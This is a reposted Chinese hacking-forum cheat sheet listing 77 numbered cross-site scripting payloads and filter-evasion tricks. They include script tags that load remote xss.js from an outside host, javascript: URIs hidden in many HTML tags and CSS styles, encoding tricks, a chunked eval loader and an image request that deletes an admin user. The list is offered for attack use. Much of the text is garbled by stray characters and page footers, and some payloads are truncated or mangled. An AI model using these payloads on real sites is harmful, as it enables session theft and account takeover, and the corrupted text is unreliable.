貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。; U1 c8 r' ~6 f* ^
(1)普通的XSS JavaScript注入' G! e! R; _6 ^2 d8 J. `
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>2 Q" X/ d, a! V# a6 ^6 ]/ n; L
(2)IMG标签XSS使用JavaScript命令' [/ ]* L- U2 V, r5 i1 r, O' R
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
6 C2 {* {! h3 d" T& |4 _* d' u. A(3)IMG标签无分号无引号2 k9 [* n5 L0 r5 A/ C' W/ s
<IMG SRC=javascript:alert(‘XSS’)>/ l* i6 ^' W1 Q; q* f
(4)IMG标签大小写不敏感% b9 x) _2 G( s
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>: j1 e& j% A/ J) I
(5)HTML编码(必须有分号)
3 l0 p Q0 C7 ^/ Z' P$ B<IMG SRC=javascript:alert(“XSS”)>
: f8 }% e$ i' D+ z* O9 O: _, O(6)修正缺陷IMG标签
$ z! m$ B1 S3 s/ _<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>
6 p: R- Z. I7 n9 x4 u# S" `" H/ o- J+ ? l1 c0 B
+ W6 x* c/ K! a9 m(7)formCharCode标签(计算器)
7 t# X- B9 x5 G& g$ W ]' o<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
{! ?2 n9 M( R( _; \(8)UTF-8的Unicode编码(计算器)! }! c' K- f0 S0 w0 I7 I
<IMG SRC=jav..省略..S')>
" |/ R5 J7 [: U2 h8 E F(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
- o' ~& G3 I- R0 K5 N; ?' J( g<IMG SRC=jav..省略..S')>; p9 o9 Y9 z. D T* s
(10)十六进制编码也是没有分号(计算器)
7 e5 k- m. z$ D* P- N9 b9 a<IMG SRC=java..省略..XSS')>8 j& X4 n1 X" N) ]) O
(11)嵌入式标签,将Javascript分开
1 o) P4 n) X( D' Q& ~<IMG SRC=”jav ascript:alert(‘XSS’);”>
/ q7 d. z! V! q, }. w(12)嵌入式编码标签,将Javascript分开9 C' N) M7 u2 O4 H
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 \3 h C( ]! U(13)嵌入式换行符
$ W0 X; T% C) M<IMG SRC=”jav ascript:alert(‘XSS’);”>
8 |" C; r3 t1 x8 B# b3 w5 K(14)嵌入式回车
% J" p& W% Z! s5 @" P, p6 }<IMG SRC=”jav ascript:alert(‘XSS’);”>
" S' ]' k, f7 N2 q4 i2 L(15)嵌入式多行注入JavaScript,这是XSS极端的例子
! N; a6 x" e* y<IMG SRC=”javascript:alert(‘XSS‘)”>
0 F# O/ \* {9 W2 O% A* Q9 r2 R(16)解决限制字符(要求同页面)
, s" c' y, j: T3 u( P+ P k. l<script>z=’document.’</script>! ?7 Y4 R+ {6 }( o* Q& B, E2 [$ R& V
<script>z=z+’write(“‘</script>$ u4 p& e" _- g8 x# n
<script>z=z+’<script’</script>4 }2 R" w/ k) i2 h
<script>z=z+’ src=ht’</script>/ u5 W% T% @0 z- a0 g8 k
<script>z=z+’tp://ww’</script>! m& t* [- o$ b& C
<script>z=z+’w.shell’</script>
9 K; P# H4 K4 w: X) H6 \1 P& z<script>z=z+’.net/1.’</script>7 [. ^3 Q8 @5 c& o
<script>z=z+’js></sc’</script>
4 O/ @" z$ J$ U, b/ @. Z<script>z=z+’ript>”)’</script>% c# w: u1 O7 Y7 s
<script>eval_r(z)</script>, A( Z9 D3 a( w5 |4 Q! I2 z5 ]+ {5 r8 u
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
- Y: c" W5 I2 {& ~. z: T0 fhttps://www.t00ls.net/viewthread ... table&tid=15267 2/6
% ?+ w# o, {* k; [+ c7 n7 T+ Eperl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out' p- l: J0 s/ N
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
( y. {* H& o4 \1 p# ~. h7 xperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
5 s) X+ o8 F* Y( f$ W* a2 W(19)Spaces和meta前的IMG标签$ l* c/ x+ f# h* e
<IMG SRC=” javascript:alert(‘XSS’);”>' R: c$ `9 m, t) X6 y* b
(20)Non-alpha-non-digit XSS2 r0 C$ V! [6 i4 [$ j
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 B' h8 \( T! o( i# @
(21)Non-alpha-non-digit XSS to 2
* [1 `' D4 _) f<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
6 \3 e, J. ~) v/ `9 F0 n(22)Non-alpha-non-digit XSS to 3
9 T! B7 n2 t" w6 {' e7 l<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>9 H% d6 A, ]2 o9 Y- E t- e8 M& R! L
(23)双开括号
8 _9 T' r9 ]( D! Z<<SCRIPT>alert(“XSS”);//<</SCRIPT> V# z- A. r+ Q; P: h' }* h
(24)无结束脚本标记(仅火狐等浏览器)4 Z' Q: d5 H, D8 p7 I' E
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
. s' V. e6 Q' L6 ?/ H6 O/ @(25)无结束脚本标记2! n l: P2 G$ Q, a6 a: I( U
<SCRIPT SRC=//3w.org/XSS/xss.js>- Q8 {. ]4 `" q5 X
(26)半开的HTML/JavaScript XSS
0 C1 z& S! L% {3 i& x<IMG SRC=”javascript:alert(‘XSS’)”
' Q" v! y& b0 }! F. U- K(27)双开角括号- L! c% ~: N1 v8 B' G" \6 z! ~
<iframe src=http://3w.org/XSS.html <: l6 ^7 b( m. U5 W- t, r, `4 ^! f- [
(28)无单引号 双引号 分号
- m1 x5 U s" Z1 R5 E t& K<SCRIPT>a=/XSS/2 x; S8 t5 w5 T) Z5 F
alert(a.source)</SCRIPT>
. i, t9 ?1 T8 ~3 I y/ N# Z(29)换码过滤的JavaScript
, k( w* J6 O; F1 [ Z) o5 C/ V\”;alert(‘XSS’);//( n6 M) p$ \' T! ?
(30)结束Title标签
( W6 B6 \0 y4 B" \) b3 u</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>
6 t& B/ y1 d% K' e2 T(31)Input Image
: G* Y7 ^- [; E4 b% l2 w<INPUT SRC=”javascript:alert(‘XSS’);”>
b3 G) Q( ^1 V1 W3 d1 B(32)BODY Image3 ], p% p K9 e: F
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>. W1 B& o/ R3 n5 U8 `2 \5 ~5 [- K1 z \# V
(33)BODY标签; @) {7 A: ^. ^. e$ C b
<BODY(‘XSS’)>9 }+ R8 T# q/ v, c7 g
(34)IMG Dynsrc
% e1 m4 x9 @. H<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 N: x: N2 n4 j$ |& L(35)IMG Lowsrc
7 T% i l+ }4 A0 [+ r<IMG LOWSRC=”javascript:alert(‘XSS’)”>
% A6 J: Z6 j% ?' h" B(36)BGSOUND. p8 ^, Q5 v7 ~8 q6 u
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
I+ R1 ]- P0 X& Q R: t9 m(37)STYLE sheet
7 z4 ]4 h' Q! _" n( _<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
4 m' G) v' C' k7 D( p7 o(38)远程样式表5 f+ _7 e7 M1 z# S
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>$ Q7 b7 G3 t& x$ v1 I4 W7 e4 Z
(39)List-style-image(列表式)
8 l& ? b: N7 R! n; n5 m# B<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS, L3 L( d l, H6 u
(40)IMG VBscript* |; A/ C# X: k6 j8 m& A
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS
2 }2 m0 x- `4 Y1 ~- ]7 s& d& y2 n(41)META链接url- w: T+ N* p9 B# m/ g" S& Q
' I7 @+ N, ^+ o H# @: N$ \- u
2 y( H! E( U' B$ b6 c
<META HTTP-EQUIV=”refresh” CONTENT=”0;
! ^3 L5 Y+ l9 o# [) S; nURL=http://;URL=javascript:alert(‘XSS’);”>5 W5 d7 ]+ t9 a7 a
(42)Iframe
% r6 V# v0 W) `1 o: v0 ] x* V! T<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>9 ]8 h0 Y% i( e; e
(43)Frame9 ^% R6 Q' F' K# n |
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
8 Q$ Z" |0 w+ l+ T8 A5 Dhttps://www.t00ls.net/viewthread ... table&tid=15267 3/66 q4 D9 p6 I k5 _. c
(44)Table3 w3 C& H$ |& V2 N- W
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
+ ^& r& }1 {4 c# `* U(45)TD
0 {4 r- k+ ?1 S( s; J! r4 {4 l<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>% r9 i2 i; p6 `+ b' a1 F0 R
(46)DIV background-image
n; S' r9 C. [8 e/ E3 z8 C<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
. T) v2 a R8 y$ e" w c. s" ^, D9 E3 w8 U(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
4 g7 T. x! `6 N" D" w1 u: S8&13&12288&65279)
& u) n$ S) t+ v# \8 Y6 L& f<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>. b) g2 s& _5 e5 m* l' z) c$ |7 {
(48)DIV expression3 c4 G ?2 U& K6 W h/ I
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>8 s6 I! ] I8 I& @* [% A+ J
(49)STYLE属性分拆表达. e- q a0 M* U
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>: e8 \- Z, ?" m) i8 c
(50)匿名STYLE(组成:开角号和一个字母开头)
* b. n9 m! j: }( K* Y) { }<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>+ w2 e2 B+ f. r/ Y! z0 e9 [
(51)STYLE background-image
3 L! X( w/ e9 C/ [/ d<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
0 B# B, y% w! @4 G) M% X5 }CLASS=XSS></A>
! Z7 @1 ^. c: M, |(52)IMG STYLE方式
K8 l5 u8 Q, t8 j( k6 Hexppression(alert(“XSS”))’>. r% t: U3 p0 C+ \
(53)STYLE background; r" y4 b) B% C( g% M( t8 V
<STYLE><STYLE
; r+ P# W5 r9 R% w L8 M$ ?type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>( |- D1 q* Z- m9 C$ X
(54)BASE# ^$ A3 [% }3 i
<BASE HREF=”javascript:alert(‘XSS’);//”>1 u5 _* c1 @: H
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
6 y1 e# z" u% s) E6 N' X<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>6 t- U6 f" X& j, J6 L
(56)在flash中使用ActionScrpt可以混进你XSS的代码0 ], d! z" |4 C! k, d* ^' O
a=”get”;- F3 F @4 ^* o' Y3 ~9 |
b=”URL(\”";
$ ?' |* d5 v4 d3 M" {c=”javascript:”;
6 s+ x) f, b. W1 P1 |d=”alert(‘XSS’);\”)”;
$ c7 j; ]# B1 Y5 a6 N- e) {eval_r(a+b+c+d);# e) {6 v6 z+ w) b
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) B+ f4 ?+ d! C( V' {<HTML xmlns:xss>
/ X1 k. ^# k+ f" V& p<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
! j0 a/ s+ Y+ f; h5 V& _4 {( O<xss:xss>XSS</xss:xss>
3 i7 ?& `/ Z* U& ^</HTML>
4 @% O! _; z3 T5 c: d(58)如果过滤了你的JS你可以在图片里添加JS代码来利用- R3 P6 K0 Z% \1 G1 t
<SCRIPT SRC=””></SCRIPT>. G1 J1 Y. G0 \" N% s5 d0 w
(59)IMG嵌入式命令,可执行任意命令
; p; G; g- d% R7 ~<IMG SRC=”http://www.XXX.com/a.php?a=b”>
/ G5 b7 o# {1 y/ l(60)IMG嵌入式命令(a.jpg在同服务器)# K; Z$ d! c p6 c/ d7 R g
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser
/ t- {* ^8 Z, w$ T6 `9 Z/ S& {(61)绕符号过滤
2 t; e9 `; w/ p9 J( S4 Q<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>) E( l7 t- S/ U3 O. {4 [* a3 x
(62)3 Q6 d, j' w( \" a" _5 z+ F
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>; Z$ R. I5 q% L8 q3 j
(63)
5 I; u3 R! x6 F; J; ?2 H<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
4 F7 x5 Y- X6 l4 w- [" O(64)
; z* T: S! I, m3 n. C0 F1 Q# a<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
% |2 I% r: m, z8 h8 s) m(65)
# X$ L! T4 B) K<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>0 b' t/ a1 p7 o7 R- C% g
(66)12-7-1 T00LS - Powered by Discuz! Board
4 S! }: b" e" f$ F& fhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
+ q: u9 R1 S, s' }( @ d6 h+ A9 M<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
6 j5 d; P% p) F( R(67), M, [- K1 [# Q: K) K3 _1 F) V2 e
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>) @9 A- a# G8 M8 l$ M+ i: @: p
</SCRIPT>
, z4 }8 X( P0 m8 F2 ?(68)URL绕行1 R4 L& u4 c( Z6 j+ k: I7 g& u
<A HREF=”http://127.0.0.1/”>XSS</A>
) S: ` r" ^) [(69)URL编码8 J5 z' h# O |- q4 e2 K1 Z
<A HREF=”http://3w.org”>XSS</A>3 z/ Q; o$ J1 {" d/ R+ U
(70)IP十进制6 \, f$ D1 x8 ~+ \
<A HREF=”http://3232235521″>XSS</A>! ]7 Z7 [' A8 ^( n0 l" ^! r0 Z
(71)IP十六进制. }, Z4 ]* @* P6 R
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>
' n1 G/ u% [" j5 y2 [5 J+ v+ h8 {5 N$ Q5 n(72)IP八进制
/ y3 W/ m# r' s; \9 K<A HREF=”http://0300.0250.0000.0001″>XSS</A>9 e# ?! W1 g: @( g. T
(73)混合编码
8 d" H- ~* t* d<A HREF=”h4 g2 ]2 i2 M8 Y, \$ t+ W/ M
tt p://6 6.000146.0×7.147/”">XSS</A>6 m4 Z: z7 Z7 L& t) x# V
(74)节省[http:]
! F: m% w6 P, L6 Q# T<A HREF=”//www.google.com/”>XSS</A>
; ~# _4 P0 O8 L(75)节省[www]
9 F9 c; l `7 u/ e1 j3 N- r+ D- G<A HREF=”http://google.com/”>XSS</A>! H7 {# A B& s( ]' n( z
(76)绝对点绝对DNS: M3 Y4 D" d1 U9 q2 k
<A HREF=”http://www.google.com./”>XSS</A>4 w, y) f2 A8 e" i) g4 X' ?9 O2 G
(77)javascript链接
& i& v4 u. v4 u$ y<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
9 ?+ ]+ t3 F1 }3 ~1 N: x, I8 u0 V5 x) x3 m
原文地址:http://fuzzexp.org/u/0day/?p=14, q# c& q& G7 \3 N5 ~, V+ Z
) F3 H* Z. n5 O! k) v: v" k. j
|